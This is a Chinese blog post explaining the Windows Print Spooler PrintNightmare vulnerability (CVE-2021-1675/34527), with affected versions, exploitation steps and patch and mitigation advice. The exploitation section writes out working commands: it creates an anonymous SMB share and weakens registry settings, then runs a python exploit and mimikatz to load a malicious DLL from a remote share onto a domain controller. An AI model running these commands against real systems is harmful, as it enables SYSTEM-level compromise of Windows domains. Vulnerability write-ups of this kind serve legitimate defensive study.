Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >Windows Print Spooler权限提升漏洞( PrintNightmare)

Windows Print Spooler权限提升漏洞( PrintNightmare)

作者头像
谢公子
发布于 2022-01-20 08:00:17
发布于 2022-01-20 08:00:17
1.7K00
代码可运行
举报
文章被收录于专栏:谢公子学安全谢公子学安全
运行总次数:0
代码可运行

Windows Print Spooler权限提升漏洞(PrintNightmare)

目录

一:漏洞概述

二:影响范围

三:漏洞利用

漏洞过程

创建匿名SMB共享

使用python脚本攻击

使用mimikatz攻击

四:漏洞防护

4.1 官方升级

4.2 临时防护措施

漏洞概述

2021年6月9日,微软发布6月安全更新补丁,修复了50个安全漏洞,其中包括一个Windows Print Spooler权限提升漏洞(CVE-2021-1675),该漏洞被标记为提权漏洞。普通用户可以利用此漏洞以管理员身份在运行打印后台处理程序服务的系统上执行代码。然而在6月21日,微软又将该漏洞升级为远程代码执行漏洞。

2021年6月29日,有安全研究员在github公布了打印机漏洞利用exp。但是令人没想到的是,该漏洞利用exp针对的漏洞是一个与CVE-2021-1675类似但不完全相同的漏洞,并且微软针对该漏洞并没有推送更新补丁,所以也就意味着这是一个0day漏洞,这个0day漏洞被称为PrintNightmare,最新的漏洞编号为CVE-2021-34527。

Print Spooler是Windows系统中用于管理打印相关事务的服务,在Windows系统中用于后台执行打印作业并处理与打印机的交互,管理所有本地和网络打印队列及控制所有打印工作。该服务对应的进程 spoolsv.exe 以SYSTEM权限执行,其设计中存在的一个严重缺陷,由于 SeLoadDriverPrivilege 中鉴权存在代码缺陷,参数可以被攻击者控制,普通用户可以通过 RPC 触发 RpcAddPrinterDrive 绕过安全检查并写入恶意驱动程序。如果一个域中存在此漏洞,域中普通用户即可通过连接域控 Spooler 服务,向域控中添加恶意驱动,从而控制整个域环境。

影响范围

受影响版本

- Windows Server 2012 R2 (Server Core installation) - Windows Server 2012 R2 - Windows Server 2012 (Server Core installation) - Windows Server 2012 - Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) - Windows Server 2008 R2 for x64-based Systems Service Pack 1 - Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) - Windows Server 2008 for x64-based Systems Service Pack 2 - Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) - Windows Server 2008 for 32-bit Systems Service Pack 2 - Windows RT 8.1 - Windows 8.1 for x64-based systems - Windows 8.1 for 32-bit systems - Windows 7 for x64-based Systems Service Pack 1 - Windows 7 for 32-bit Systems Service Pack 1 - Windows Server 2016 (Server Core installation) - Windows Server 2016 - Windows 10 Version 1607 for x64-based Systems - Windows 10 Version 1607 for 32-bit Systems - Windows 10 for x64-based Systems - Windows 10 for 32-bit Systems - Windows Server, version 20H2 (Server Core Installation) - Windows 10 Version 20H2 for ARM64-based Systems - Windows 10 Version 20H2 for 32-bit Systems - Windows 10 Version 20H2 for x64-based Systems - Windows Server, version 2004 (Server Core installation) - Windows 10 Version 2004 for x64-based Systems - Windows 10 Version 2004 for ARM64-based Systems - Windows 10 Version 2004 for 32-bit Systems - Windows 10 Version 21H1 for 32-bit Systems - Windows 10 Version 21H1 for ARM64-based Systems - Windows 10 Version 21H1 for x64-based Systems - Windows 10 Version 1909 for ARM64-based Systems - Windows 10 Version 1909 for x64-based Systems - Windows 10 Version 1909 for 32-bit Systems - Windows Server 2019 (Server Core installation) - Windows Server 2019 - Windows 10 Version 1809 for ARM64-based Systems - Windows 10 Version 1809 for x64-based Systems - Windows 10 Version 1809 for 32-bit Systems

漏洞利用

漏洞过程

1:首先我们搭建一个SMB匿名共享,放我们的恶意dll文件。 2:然后执行利用工具,工具运行后会先检测C:\Windows\System32\DriverStore\FileRepository目录下 ntprint.inf_amd64_xx 文件名,自动替换。

  • 然后远程拉取我们设置的匿名共享的恶意dll文件
  • py脚本会将我们的恶意dll文件传到域控的 C:\Windows\System32\spool\drivers\x64\3\ 目录下并执行。 而mimikatz则是将我们的恶意dll文件传到域控的 C:\Windows\System32\spool\drivers\x64\old\2\ 目录下并执行(会创建old\2\目录)。

检测是否存在漏洞

先检测目标机器是否开启MS-RPRN服务,存在即可以尝试利用:

python3 rpcdump.py @10.211.55.14 | grep MS-RPRN

创建匿名SMB共享

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
mkdir C:\share
icacls C:\share\ /T /grant "ANONYMOUS LOGON":r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
执行完以上语句后,部分机器需要重启

使用python脚本攻击

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
python3 CVE-2021-1675.py xie.com/test:P@ss1234@10.211.55.14 '\\10.211.55.7\share\1.dll'

使用mimikatz攻击

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
mimikatz.exe
misc::printnightmare /server:10.211.55.14 /library:\\10.211.55.7\share\1.dll

实战测试攻击Windows Server2016、2019均能成功上线。Server2012只能上传恶意dll,不能执行上线,08未攻击成功。

漏洞防护

4.1

官方升级

目前微软官方已针对支持的系统版本发布了修复该漏洞的安全补丁,强烈建议受影响用户尽快安装补丁进行防护,官方下载链接: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675 注:由于网络问题、计算机环境问题等原因,Windows Update的补丁更新可能出现失败。用户在安装补丁后,应及时检查补丁是否成功更新。 右键点击Windows图标,选择“设置(N)”,选择“更新和安全”-“Windows更新”,查看该页面上的提示信息,也可点击“查看更新历史记录”查看历史更新情况。 针对未成功安装的更新,可点击更新名称跳转到微软官方下载页面,建议用户点击该页面上的链接,转到“Microsoft更新目录”网站下载独立程序包并安装。

4.2

临时防护措施

若相关用户暂时无法进行补丁更新,可通过禁用Print Spooler服务来进行缓解: 一:在服务应用(services.msc)中找到Print Spooler服务。

二:停止运行服务,同时将“启动类型”修改为“禁用”。

参考:

http://blog.nsfocus.net/windows-print-spoolercve/

https://github.com/hhlxf/PrintNightmare

https://msrc.microsoft.com/update-guide/zh-cn/vulnerability/CVE-2021-1675

https://mp.weixin.qq.com/s/fVzaBhHbI6QTlnvnK0nMug

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-07-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 谢公子学安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
CVE-2021-1675 Windows Print Spooler RCE EXP
让我们检查一下关于 RpcAddPrinterDriver 调用的 MS-RPRN:打印系统远程协议。
Khan安全团队
2021/07/08
1.2K0
CVE-2021-1675 Windows Print Spooler RCE EXP
CVE-2021-1675/34527:Windows Print Spooler权限提升复现
Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中。
Timeline Sec
2021/08/20
3.6K1
漏洞情报|2021年8月“微软补丁日” 多个产品高危漏洞风险通告
近日,腾讯云安全运营中心监测到,微软发布了2021年8月的例行安全更新公告,共涉及漏洞数44个,其中严重级别漏洞7个,重要级别37个。本次发布涉及Windows操作系统,Office,Windows Defender,Visual Studio,. NET,Edge等多个软件的安全更新。 为避免您的业务受影响,腾讯云安全建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。 漏洞详情 在此次公告中以下漏洞需要重点关注: CVE-2021-36948(Windows Upda
云鼎实验室
2021/08/11
1.3K0
【安全更新】微软3月多个产品高危漏洞通告
北京时间3月10日,微软发布3月安全更新补丁,修复了89个安全问题,涉及Microsoft Windows、Microsoft Office、Microsoft Exchange Server、Internet Explorer、Visual Studio等广泛使用的产品,其中包括远程代码执行和权限提升等高危漏洞类型。
绿盟科技安全情报
2021/03/18
7760
【安全更新】微软3月多个产品高危漏洞通告
【安全更新】微软1月安全更新多个产品高危漏洞通告
北京时间1月13日,微软发布1月安全更新补丁,修复了83个安全问题,涉及Microsoft Windows、Microsoft Office、Microsoft SQL Server、Visual Studio、Microsoft Defender等广泛使用的产品,其中包括远程代码执行和权限提升等高危漏洞类型。
绿盟科技安全情报
2021/01/18
1.4K0
CVE-2022-22718:Windows Print Spooler提权
2022年02月09日,微软发布了安全更新,修复了48个安全漏洞(不包括22个Microsoft Edge漏洞),其中CVE-2022-22718为Windows后台打印程序特权提升漏洞,CVSS评分7.7
Al1ex
2023/05/12
6370
CVE-2022-22718:Windows Print Spooler提权
【漏洞通告】Windows TCP/IP 远程代码执行漏洞(CVE-2021-24074)
2月10日,绿盟科技监测到微软在2月的补丁更新中修复了Windows TCP/IP远程代码执行漏洞(CVE-2021-24074),该漏洞位于IPv4源路由中,Windows默认配置下不启用此功能,攻击者可通过构造特殊的IP数据包,在目标主机上远程执行任意代码。CVSS评分为9.8,影响系统广泛,请相关用户更新补丁进行防护。
绿盟科技安全情报
2021/03/03
1K0
【漏洞通告】Windows TCP/IP 远程代码执行漏洞(CVE-2021-24074)
Microsoft Office 远程代码执行
昨天大哥扔了个MS office 0day(CVE-2022-30190)的截图到群里,晚上就复现了一下 ,随即有了下文 。
Gamma实验室
2022/08/30
7080
Microsoft Office 远程代码执行
【安全通告】2021年12月“微软补丁日” 多个产品高危漏洞风险通告
腾讯云安全运营中心监测到, 微软发布了2021年12月的例行安全更新公告,共涉及漏洞数67个,其中严重级别漏洞7个,重要级别60个。本次发布涉及Windows、ASP.NET、Visual Studio、Azure、Defender for IoT、Microsoft Office、SharePoint Server、PowerShell、Remote Desktop Client、Windows Hyper-V、Windows Mobile Device Management、Windows Remot
云鼎实验室
2021/12/16
8700
社工钓鱼之Office钓鱼(上)
CVE-2017-8759是一个新型的Office文档高级威胁攻击漏洞,该漏洞允许恶意人士在解析SOAP WSDL的定义内容期间注入任意代码,FireEye公司对该微软Office文档进行了分析,并发现攻击者能够利用代码注入方式下载并执行一份包含PowerShell指令的Visual Basic脚本,黑客在Offcie文档中嵌入新的Moniker对象,利用的是.net库漏洞,在Office文档中加载执行远程的恶意.NET代码
Al1ex
2023/05/26
6800
社工钓鱼之Office钓鱼(上)
【安全通告】2022年1月“微软补丁日” 高危远程代码执行漏洞风险通告
腾讯云安全运营中心监测到, 微软发布了2022年1月的例行安全更新公告,共涉及漏洞数122个,其中严重级别漏洞9个,重要级别89个。本次发布涉及 Microsoft Windows,Microsoft Edge, Exchange Server, Microsoft Office , SharePoint Server, .NET Framework, Microsoft Dynamics, Windows Hyper-V, Windows Defender 等多个软件的安全更新。 为避免您的业务受影响,腾
云鼎实验室
2022/01/12
2.1K0
漏洞情报|2021年1月“微软补丁日” Windows Defender等多个产品高危漏洞风险通告(CVE-2021-1647)
近日,腾讯云安全运营中心监测到,微软发布了2021年1月的例行安全更新公告,包含漏洞CVE编号83个,其中严重级别漏洞10个,重要级别73个。远程代码执行漏洞14个,安全功能绕过漏洞6个,信息泄露漏洞11个,特权提升34个。涉及关于Windows、Windows Server、Edge、Office、Visual Studio、.Net、ASP.net、Azure等多个产品的高危漏洞。 为避免您的业务受影响,腾讯云安全建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。 漏
云鼎实验室
2021/01/14
5590
CVE-2021-1732:Windows Win32k提权
Windows Server, version 20H2 (Server Core Installation)
Al1ex
2021/07/21
3080
CVE-2021-1732:Windows Win32k提权
【安全更新】微软5月安全更新多个产品高危漏洞通告
5月12日,微软发布5月安全更新补丁,修复了55个安全漏洞,涉及Windows、Microsoft Office、Exchange Server、Visual Studio Code、Internet Explorer等广泛使用的产品,其中包括远程代码执行和权限提升等高危漏洞类型。
绿盟科技安全情报
2021/05/14
1.3K0
【漏洞通告】Windows 网络文件系统漏洞(CVE-2020-17051、CVE-2020-17056)
11月11日,绿盟科技监测到微软在11月月度补丁更新中修复了两个存在于Windows 网络文件系统(Network File System)中的漏洞,CVE-2020-17051为远程代码执行漏洞,CVE-2020-17056为信息泄露漏洞。
绿盟科技安全情报
2020/11/16
9050
【漏洞通告】Windows 网络文件系统漏洞(CVE-2020-17051、CVE-2020-17056)
CVE-2024-38050|Windows Workstation 服务权限提升漏洞
创建和维护到远程服务的客户端网络连接。如果服务停止,这些连接将不可用。如果服务被禁用,任何直接依赖于此服务的服务将无法启动。
信安百科
2024/07/22
1750
CVE-2024-38050|Windows Workstation 服务权限提升漏洞
【漏洞通告】微软6月安全更新多个产品高危漏洞通告
北京时间6月10日,微软发布6月安全更新补丁,修复了130个安全问题,涉及Microsoft Windows、Internet Explorer、Microsoft Edge、Windows Defender、Microsoft Office、Visual Studio、Adobe Flash Player等广泛使用的产品,其中包括内存泄露和远程代码执行等高危漏洞类型。
绿盟科技安全情报
2020/06/15
1.2K0
【漏洞通告】微软5月安全更新多个产品高危漏洞通告
北京时间5月13日,微软发布5月安全更新补丁,修复了111个安全问题,涉及Microsoft Windows、Internet Explorer、Microsoft Edge、.NET Framework、Microsoft Office、Visual Studio等广泛使用的产品,其中包括特权提升和远程代码执行等高危漏洞类型。
绿盟科技安全情报
2020/05/25
1.1K0
CVE-2021-1732:Windows Win32k提权
Windows Server, version 20H2 (Server Core Installation)
Al1ex
2021/03/27
1.4K0
CVE-2021-1732:Windows Win32k提权
【漏洞通告】微软9月安全更新多个产品高危漏洞通告
北京时间9月9日,微软发布9月安全更新补丁,修复了129个安全问题,涉及Microsoft Windows、Internet Explorer、Microsoft Office、Microsoft Exchange Server、Visual Studio、ASP.NET等广泛使用的产品,其中包括远程代码执行和权限提升等高危漏洞类型。
绿盟科技安全情报
2020/09/14
2K0
推荐阅读
相关推荐
CVE-2021-1675 Windows Print Spooler RCE EXP
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验